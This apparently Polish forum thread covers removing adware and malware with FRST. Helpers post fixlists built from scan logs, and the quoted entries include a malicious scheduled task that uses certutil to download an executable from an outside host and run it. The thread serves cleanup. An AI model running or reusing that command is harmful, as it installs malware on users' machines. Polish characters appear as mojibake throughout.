Elektroda.pl
Elektroda.pl
X

Search our partners

Find the latest content on electronic components. Datasheets.com
Elektroda.pl
Please add exception to AdBlock for elektroda.pl.
If you watch the ads, you support portal and users.

Jak usun望 z systemu Safe finder? Logi z FRST.

jack448 09 Aug 2020 16:06 537 11
  • #2
    krzychupar
    Level 43  
    Safe finder sprawdza貫 w programach i funkcje i w rozszerzeniach przegl康arek.

    Odinstaluj:
    CPUID CPU-Z 1.81.1 (HKLM\...\CPUID CPU-Z_is1) (Version: 1.81.1 - ) <==== UWAGA

    Otw鏎z notatnik i wklej:

    CloseProcesses:
    CreateRestorePoint:
    Shortcut: C:\Users\Dom\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.htm
    ShortcutWithArgument: C:\Users\Dom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\Dom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
    ShortcutWithArgument: C:\Users\Dom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\Dom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
    ShortcutWithArgument: C:\Users\Dom\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
    AlternateDataStreams: C:\ProgramData\Temp:D57FAB99 [95]
    AlternateDataStreams: C:\ProgramData\Temp:E6187576 [133]
    AlternateDataStreams: C:\Users\Dom\Downloads\Ellie Goulding - Love me like to do.mp3.nile:TOC.WMV [130]
    AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
    Hosts:
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\544vgkay1ss\sze3ru1a221.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\a2fq1rkjcik\vrxsmaabxc1.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\auqcyrfvypf\rgpjmnv4dcp.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\fdtl1ctmh0q\bvxlx3icee3.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\mwucu4zsbrl\xaqkpzzqu2m.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\pxpsksmx5i2\dyo21ugnuhw.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\rlk1d3xsalw\55hsgahbcsg.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\xnwtgxzr2cu\hqbpty4n43u.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\xrhi4hthm4i\yujqf3lxclz.exe
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-06F83.tmp\vrxsmaabxc1.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-0SI04.tmp\xaqkpzzqu2m.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-4MPSP.tmp\rgpjmnv4dcp.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-4U3AA.tmp\dyo21ugnuhw.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-98TFM.tmp\hqbpty4n43u.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-J30U4.tmp\yujqf3lxclz.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-LL2PS.tmp\55hsgahbcsg.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-T6G22.tmp\sze3ru1a221.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-V5L54.tmp\bvxlx3icee3.tmp
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\2NFB6E28IP\2NFB6E28I.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\C76XU56J2F\W00Y2884W.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\F5I7IPTYXM\F5I7IPTYX.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\J0H2QOXASN\R6V6LY6M1.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\N94LDL6OC6\N94LDL6OC.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\P87VC5E7X3\911WK8GSR.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\PT8XJI9526\PT8XJI952.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\X29BJ9NWPH\X29BJ9NWP.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\XTWFYTE35X\XTWFYTE35.exe
    (LinaRougni) [Brak podpisu cyfrowego] C:\Program Files (x86)\auz\410826515.exe
    HKLM-x32\...\Run: [kissq] => C:\Users\Dom\AppData\Local\Temp\kissq.exe************* [4410880 2020-08-08] () [Brak podpisu cyfrowego] <==== UWAGA
    HKLM\...\RunOnce: [z5gcgu5d4gy] => C:\Program Files (x86)\auz\410826515.exe [431104 2020-08-08] (LinaRougni) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [QuietThunder] => C:\Windows\rss\csrss.exe [4028416 2020-08-09] () [Brak podpisu cyfrowego] <==== UWAGA
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: F - F:\setup.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: G - G:\setup.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: {4877c586-b436-11e4-881d-b4b52f287584} - G:\setup.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: {60cc5c6c-40b7-11e4-ae53-b4b52f287584} - G:\setup.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: {6bae7a72-ecd6-11e3-a739-b4b52f287584} - F:\setup.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: {8c8202a2-cfa9-11e3-91fb-b4b52f287584} - G:\setup.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: {b50e3182-6eed-11e3-af98-b4b52f287584} - G:\PcOptions.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: {c4494a58-9969-11e3-9191-b4b52f287584} - F:\Startme.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\MountPoints2: {c85c2953-84b8-11e5-8dd3-b4b52f287584} - G:\LG_PC_Programs.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [9564274] => C:\Users\Dom\AppData\Roaming\a2fq1rkjcik\vrxsmaabxc1.exe [2122691 2020-08-08] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [X4Y4BQL9T65D5VA] => C:\Program Files\PT8XJI9526\PT8XJI952.exe [5836800 2020-08-08] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [8991432] => C:\Users\Dom\AppData\Roaming\pxpsksmx5i2\dyo21ugnuhw.exe [2122691 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [40HKYSCN9M7JC9P] => C:\Program Files\C76XU56J2F\W00Y2884W.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [7341464] => C:\Users\Dom\AppData\Roaming\xrhi4hthm4i\yujqf3lxclz.exe [2122691 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [F397LN0SOOGA5E0] => C:\Program Files\XTWFYTE35X\XTWFYTE35.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [CloudNet] => C:\Users\Dom\AppData\Roaming\32c3672da7a6\32c3672da7a6.exe [549376 2020-08-09] () [Brak podpisu cyfrowego] <==== UWAGA
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [6121323] => C:\Users\Dom\AppData\Roaming\544vgkay1ss\sze3ru1a221.exe [2122691 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [MIS33A4CKUFL6D7] => C:\Program Files\J0H2QOXASN\R6V6LY6M1.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [I4XKJY39XKIQ5X7] => C:\Program Files\P87VC5E7X3\911WK8GSR.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [6HVYBRG5SXMYS1M] => C:\Program Files\X29BJ9NWPH\X29BJ9NWP.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [8985320] => C:\Users\Dom\AppData\Roaming\auqcyrfvypf\rgpjmnv4dcp.exe [2122691 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [T7THS9E62IOKP0E] => C:\Program Files\2NFB6E28IP\2NFB6E28I.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [7370534] => C:\Users\Dom\AppData\Roaming\rlk1d3xsalw\55hsgahbcsg.exe [2420254 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [XQH3QPXL5NDQ0VI] => C:\Program Files\N94LDL6OC6\N94LDL6OC.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [4025185] => C:\Users\Dom\AppData\Roaming\fdtl1ctmh0q\bvxlx3icee3.exe [2420254 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [7549555] => C:\Users\Dom\AppData\Roaming\xnwtgxzr2cu\hqbpty4n43u.exe [2420254 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [7BRZKOIA5GDBHIY] => C:\Program Files\1HIPS0JQSI\E6O40ZPRR.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKLM\Software\...\AppCompatFlags\Custom\chrome.exe: [{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb] ->
    HKLM\Software\...\AppCompatFlags\Custom\explorer.zza: [{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb] ->
    HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb] ->
    AppInit_DLLs: C:\ProgramData\Voyasollam\Movetip.dll => Brak pliku
    AppInit_DLLs-x32: C:\ProgramData\Voyasollam\Dontom.dll => Brak pliku
    Startup: C:\Users\Dom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\abswrbbu.lnk [2020-08-09]
    GroupPolicy: Ograniczenia - Chrome <==== UWAGA
    GroupPolicyScripts: Ograniczenia <==== UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
    Task: {B4485D47-7F82-4DEF-9DFD-7452A6EBC8F1} - System32\Tasks\Opera scheduled Autoupdate 711520318 => C:\Users\Dom\AppData\Roaming\Microsoft\Windows\abswrbbu\eitftavv.exe [199168 2013-08-29] () [Brak podpisu cyfrowego] [Plik w u篡ciu] <==== UWAGA
    Task: {C6B58BC6-BE5B-4231-BC26-AA6241EB525A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\Dom\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Dom\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {DB17D9ED-8BC2-4FEE-AB01-F34E646C3EAD} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1660520 2020-02-28] (Avast Software s.r.o. -> Avast Software)
    Task: {DD35A77D-B67B-4F7B-AAF4-88145A0C562F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4028416 2020-08-09] () [Brak podpisu cyfrowego] <==== UWAGA
    Task: {E5F5DC95-9796-4124-A304-15ACEA8CAAAE} - System32\Tasks\{1277A051-8985-4FD2-A969-5DA919A8E56B} => C:\Windows\system32\pcalua.exe -a "F:\Nowy folder (2)\sp56573.exe" -d "F:\Nowy folder (2)"
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...USIXdBcn4wW5tHI02KmXapJozo48oieEWDVQ,,&q={searchTerms}
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-08 12:52:24&bName=
    URLSearchHook: HKLM-x32 -> Domy郵ne = {CCC7B159-1D8C-11E3-B2AD-F3EF3D58318D}
    SearchScopes: HKLM-x32 -> DefaultScope - brak warto軼i
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-933094867-2505577333-1658146549-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear
    FF Homepage: Mozilla\Firefox\Profiles\56okxpc2.default-1510597276235 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-08 12:52:24&bName=
    FF NewTab: Mozilla\Firefox\Profiles\56okxpc2.default-1510597276235 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-08 12:52:24&bName=
    FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
    S2 FlexGridService; C:\ProgramData\FlexGridService\FlexGridService.exe [2150400 2020-08-08] (Bv_Soft) [Brak podpisu cyfrowego] <==== UWAGA
    "maewocyl" => serwis zosta odblokowany. <==== UWAGA
    R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    "maewocyl" => serwis zosta odblokowany. <==== UWAGA
    S3 andnetadb; System32\Drivers\lgandnetadb.sys [X]
    S3 AndnetBus; system32\DRIVERS\lgandnetbus64.sys [X]
    S3 AndNetDiag; system32\DRIVERS\lgandnetdiag64.sys [X]
    S3 ANDNetModem; system32\DRIVERS\lgandnetmodem64.sys [X]
    S3 andnetndis; system32\DRIVERS\lgandnetndis64.sys [X]
    S3 usbbus; system32\DRIVERS\lgx64bus.sys [X]
    S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X]
    S3 USBModem; system32\DRIVERS\lgx64modem.sys [X]
    2020-08-09 08:10 - 2020-08-09 14:45 - 000000004 _____ () C:\ProgramData\lock.dat
    2020-08-09 08:12 - 2020-08-09 14:51 - 000000004 _____ () C:\ProgramData\rc.dat
    2020-08-09 08:10 - 2020-08-09 08:10 - 000000008 _____ () C:\ProgramData\ts.dat
    2014-10-14 08:53 - 2013-08-30 09:47 - 006583664 _____ (AVAST Software) C:\Program Files\AVAST S
    2019-10-26 17:08 - 2019-10-26 17:08 - 000037607 _____ () C:\Program Files (x86)\Common Files\license.rtf
    2019-10-26 17:08 - 2019-10-26 17:08 - 000008046 _____ () C:\Program Files (x86)\Common Files\setupBanner.jpg
    2016-05-17 12:05 - 2009-02-10 19:04 - 005846351 _____ () C:\Users\Dom\AppData\Roaming\chwila_melodia.ogg
    2016-05-17 12:05 - 2009-02-10 19:40 - 008110669 _____ () C:\Users\Dom\AppData\Roaming\chwila_podklad.ogg
    2014-05-24 13:48 - 2009-02-10 19:46 - 000022920 _____ () C:\Users\Dom\AppData\Roaming\chwila_tekst.xml
    2016-05-17 12:09 - 2008-05-26 17:10 - 000034321 _____ () C:\Users\Dom\AppData\Roaming\model_tekst.xml
    2016-05-17 12:06 - 2009-02-04 22:33 - 003791600 _____ () C:\Users\Dom\AppData\Roaming\nieklam_melodia.ogg
    2016-05-17 12:06 - 2009-02-04 22:36 - 005814122 _____ () C:\Users\Dom\AppData\Roaming\nieklam_podklad.ogg
    2014-05-24 13:49 - 2009-02-04 22:25 - 000019056 _____ () C:\Users\Dom\AppData\Roaming\nieklam_tekst.xml
    2016-05-17 12:07 - 2008-06-24 20:45 - 005889967 _____ () C:\Users\Dom\AppData\Roaming\pokaz_melodia.ogg
    2016-05-17 12:07 - 2008-06-03 20:25 - 008223926 _____ () C:\Users\Dom\AppData\Roaming\pokaz_podklad.ogg
    2016-05-17 12:08 - 2008-07-06 21:50 - 000025216 _____ () C:\Users\Dom\AppData\Roaming\pokaz_tekst.xml
    2020-08-08 14:51 - 2020-08-08 14:51 - 008614400 _____ () C:\Users\Dom\AppData\Local\agent.dat
    2020-08-08 14:51 - 2020-08-08 14:51 - 000043520 _____ () C:\Users\Dom\AppData\Local\ApplicationHosting.dat
    2020-08-08 14:50 - 2020-08-08 14:50 - 000000558 _____ () C:\Users\Dom\AppData\Local\bowsakkdestx.txt
    2020-08-08 14:51 - 2020-08-08 14:51 - 000071712 _____ () C:\Users\Dom\AppData\Local\Config.xml
    2016-05-03 11:50 - 2017-10-13 09:05 - 000013312 _____ () C:\Users\Dom\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2020-08-08 14:51 - 2020-08-08 14:48 - 001134592 _____ () C:\Users\Dom\AppData\Local\Groovestring.exe
    2020-08-08 14:51 - 2020-08-08 14:51 - 000067933 _____ () C:\Users\Dom\AppData\Local\Groovestring.tst
    2020-08-09 08:35 - 2020-08-09 08:35 - 000011856 _____ () C:\Users\Dom\AppData\Local\InstallationConfiguration.xml
    2020-08-08 14:49 - 2020-08-08 14:49 - 000141312 _____ () C:\Users\Dom\AppData\Local\installer.dat
    2014-09-20 20:31 - 2014-09-20 20:31 - 000000001 _____ () C:\Users\Dom\AppData\Local\llftool.4.40.agreement
    2020-08-08 14:51 - 2020-08-08 14:51 - 000126464 _____ () C:\Users\Dom\AppData\Local\lobby.dat
    2020-08-08 14:51 - 2020-08-08 14:51 - 000005568 _____ () C:\Users\Dom\AppData\Local\md.xml
    2020-08-08 14:51 - 2020-08-08 14:51 - 000126464 _____ () C:\Users\Dom\AppData\Local\noah.dat
    2019-04-03 21:06 - 2019-05-19 20:47 - 000000600 _____ () C:\Users\Dom\AppData\Local\PUTTY.RND
    2020-08-08 14:51 - 2020-08-08 14:51 - 001895384 _____ () C:\Users\Dom\AppData\Local\SolLa.bin
    2020-08-08 14:51 - 2020-08-08 14:48 - 001134592 _____ () C:\Users\Dom\AppData\Local\Sonstrong.exe
    2020-08-08 14:51 - 2020-08-08 14:51 - 002174950 _____ () C:\Users\Dom\AppData\Local\Sonstrong.tst
    2016-09-18 09:53 - 2016-09-18 09:54 - 025397336 _____ (One Click Root) C:\Users\Dom\AppData\Local\TempOneClickRoot.exe
    2014-01-23 21:59 - 2014-01-23 21:59 - 000003181 _____ () C:\Users\Dom\AppData\Local\unins000.dat
    2014-01-23 21:59 - 2014-01-23 21:59 - 000707504 _____ () C:\Users\Dom\AppData\Local\unins000.exe
    2014-01-23 21:59 - 2014-01-23 21:59 - 000011761 _____ () C:\Users\Dom\AppData\Local\unins000.msg
    2019-10-08 19:44 - 2019-10-08 19:44 - 000000000 _____ () C:\Users\Dom\AppData\Local\{A7CFECE6-C0B3-4E9C-9C29-540CA658976E}

    EmptyTemp:

    Plik zapisz pod nazw fixlist.txt i umie嗆 w folderze gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.
  • #3
    jack448
    Level 9  
    Dzieki za szybk pomoc.
    Zrobi貫m tak jak napisa貫, niestety program nadal jest i sieje zam皻
    Da si co jeszcze zrobi?
    I jeszcze jedno, po ka盥ym nowym odpaleniu Windowsa chce sie zainstalowa Ture czasam uda mi sie przerwac instalacje, jesli nie zd捫e to jego mo積a p騜niej normalnie odinstalowa
  • #8
    krzychupar
    Level 43  
    Otw鏎z notatnik i wklej:

    CloseProcesses:
    CreateRestorePoint:
    AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\mwucu4zsbrl\xaqkpzzqu2m.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\qdel4ggfv2p\ielqsdtfqwx.exe <2>
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\tt3cxopcu4o\gaq5xbljbgl.exe
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\btg53q0lwa4\ifhvvyy.exe
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-5JGPQ.tmp\gaq5xbljbgl.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-JHO0G.tmp\ielqsdtfqwx.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-O6HMI.tmp\ielqsdtfqwx.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-TIIMR.tmp\xaqkpzzqu2m.tmp
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\0XPXMUHRN3\SKGAX1KTT.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\CSPJXYQIWQ\46D0XBBQ9.exe <2>
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\F5I7IPTYXM\F5I7IPTYX.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\OCM1DRJTCD\OCM1DRJTC.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\RBASY459J3\DO15UL6PG.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\Y0L5YDZO9X\Y0L5YDZO9.exe
    (LinaRougni) [Brak podpisu cyfrowego] C:\Program Files (x86)\auz\410826515.exe
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [4456691] => C:\Users\Dom\AppData\Roaming\mwucu4zsbrl\xaqkpzzqu2m.exe [2122691 2020-08-08] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [VADOPCP48A78EQJ] => C:\Program Files\F5I7IPTYXM\F5I7IPTYX.exe [5836800 2020-08-08] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [qeiasgcp] => "C:\Users\Dom\gaarclce.exe"
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [1AY693K2X43WOR0] => C:\Program Files\RBASY459J3\DO15UL6PG.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [7210695] => C:\Users\Dom\AppData\Roaming\tt3cxopcu4o\gaq5xbljbgl.exe [2420254 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [3O5LGCYCM2HL9IO] => C:\Program Files\Y0L5YDZO9X\Y0L5YDZO9.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [Y69D6L0QHOCYK7O] => C:\Program Files\OCM1DRJTCD\OCM1DRJTC.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [SGJZKJWP80B83OJ] => C:\Program Files\0XPXMUHRN3\SKGAX1KTT.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [6848219] => C:\Users\Dom\AppData\Roaming\qdel4ggfv2p\ielqsdtfqwx.exe [2420254 2020-08-09] () [Brak podpisu cyfrowego] [Plik w u篡ciu]
    HKU\S-1-5-21-933094867-2505577333-1658146549-1000\...\Run: [EBUICX6MB8DRSH4] => C:\Program Files\CSPJXYQIWQ\46D0XBBQ9.exe [5836800 2020-08-09] (KIAN) [Brak podpisu cyfrowego]
    Task: {6815D374-5283-4852-95EA-B651BD0B3330} - \Opera scheduled Autoupdate 711520318 -> Brak pliku <==== UWAGA
    EmptyTemp:

    Plik zapisz pod nazw fixlist.txt i umie嗆 w folderze gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.
  • #9
    jack448
    Level 9  
    Nie pomog這, Firefox nadal 鈍iruje, oraz zacz掖 si sam otwiera internet explorer w wielu oknach, wcze郾iej tego nie by這.Chrome dzia豉 poprawnie.
    Programu safe finder nie ma na li軼ie program闚
  • #10
    Kolobos
    IT specialist
    Trzeba bylo myslec przed infekcja, a nie teraz narzekac. Masz mase infekcji, w tym rootkita.

    W msconfig ustaw Windows 7 jako domyslny, a Windows Fast Mode usun, jezeli nie masz takiego wpisu w msconfig to zamiesc screen i na razie nie wykonuj Fixlist! Jezeli masz to po ustawieniu wykonaj Fixlist.

    Wykonaj taki Fixlist.txt z poziomu WinRe ( https://www.fixitpc.pl/topic/4414-diagnostyka...4%85cych-windows/?tab=comments#comment-179852 ), nastepnie z poziomu systemu:
    CloseProcesses:
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\mwucu4zsbrl\xaqkpzzqu2m.exe
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\qdel4ggfv2p\ielqsdtfqwx.exe <2>
    () [Brak podpisu cyfrowego] [Plik w u篡ciu] C:\Users\Dom\AppData\Roaming\tt3cxopcu4o\gaq5xbljbgl.exe
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\btg53q0lwa4\ifhvvyy.exe
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-5JGPQ.tmp\gaq5xbljbgl.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-JHO0G.tmp\ielqsdtfqwx.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-O6HMI.tmp\ielqsdtfqwx.tmp
    () [Brak podpisu cyfrowego] C:\Users\Dom\AppData\Local\Temp\is-TIIMR.tmp\xaqkpzzqu2m.tmp
    (Bv_Soft) [Brak podpisu cyfrowego] C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\0XPXMUHRN3\SKGAX1KTT.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\CSPJXYQIWQ\46D0XBBQ9.exe <2>
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\F5I7IPTYXM\F5I7IPTYX.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\OCM1DRJTCD\OCM1DRJTC.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\RBASY459J3\DO15UL6PG.exe
    (KIAN) [Brak podpisu cyfrowego] C:\Program Files\Y0L5YDZO9X\Y0L5YDZO9.exe
